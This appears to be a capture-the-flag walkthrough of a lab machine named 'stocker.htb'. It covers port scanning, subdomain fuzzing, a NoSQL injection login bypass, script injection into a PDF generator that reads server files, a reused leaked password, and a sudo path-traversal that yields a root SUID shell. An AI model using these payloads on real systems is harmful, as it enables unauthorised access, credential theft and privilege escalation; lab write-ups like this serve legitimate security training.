nmap -p- --min-rate 5000 10.10.11.196 -Pn 
After discovering open ports, let's do greater nmap scan.
nmap -A -sC -sV -p22,80 10.10.11.196 
From nmap scan, we also see this ip address is resolved into stocker.htb, let's add this into /etc/hosts file.
Our web application is like that.
Let's do subdomain enumeration via ffuf command.
ffuf -u http://10.10.11.196 -H "Host: FUZZ.stocker.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
Let's add dev.stocker.htb into /etc/hosts file also.
We have application and login page confronts us.
Let's look at requests via zap try to add injections.
That's results of wapanalyzer.
Request&Response body is like that.
From my enumeration, it is MERN application, that's why we can inject JSON data and it will be NoSQLI payloads.
To do this,
1.First, we need to change Content-Type header into application/json.
2.Then, enter data as JSON standard.
Now, it's time to add NoSQLI payloads as below which means not equal to this value.
{"username":{"$ne": "dr4ks"}, "password": {"$ne":"dr4ks"}}Now, we are successfully bypass authentication.
We have such an application after authentication.
There's feature that after buying some item, there's PDF file generated which actually information of item about your payment.
I looked at all requests while this processis happening and find interesting /api/order endpoint.
Let's inject some data into here.
I just delete some value of keys in json structure and see that where application is running.
Let's inject some payloads to write into .pdf file. For below payload, I add \(backslash) due to escaping " characters.
<img src=\"x\" onerror=\"document.write('test')\" />
It gives me orderId, while browsing this id, I see that test word is written into .pdf file.
Now, let's add payload to read index.js file of application.
<img src=\"x\" onerror=\"document.write('<iframe src=file:///var/www/dev/index.js width=100% height=100%></iframe>')\" />
I read content of this file by browsing this orderID.
From here, I see hard-coded credentials.
dev:IHeardPassphrasesArePrettySecure
I also read file /etc/passwd to get usernames of machine, that's why it will be password of angoose user.
angoose: IHeardPassphrasesArePrettySecure
Let's connect into machine via ssh.
user.txt
For privilege escalation, I just check sudo -l command's result.
It means, I can run .js file via root permission, for that I will write malicious .js file which copies /bin/bash and gives SUID permission.
require('child_process').exec('cp /bin/bash /tmp/dr4ks; chown root:root /tmp/dr4ks; chmod 4777 /tmp/dr4ks')
Let's execute this malicious script.
sudo node /usr/local/scripts/../../../tmp/dr4ks.js After execution, let's check SUID privilege is enabled or not via ls -al /tmp/dr4ks.
We can run this copied bash file via -p option.
root.txt
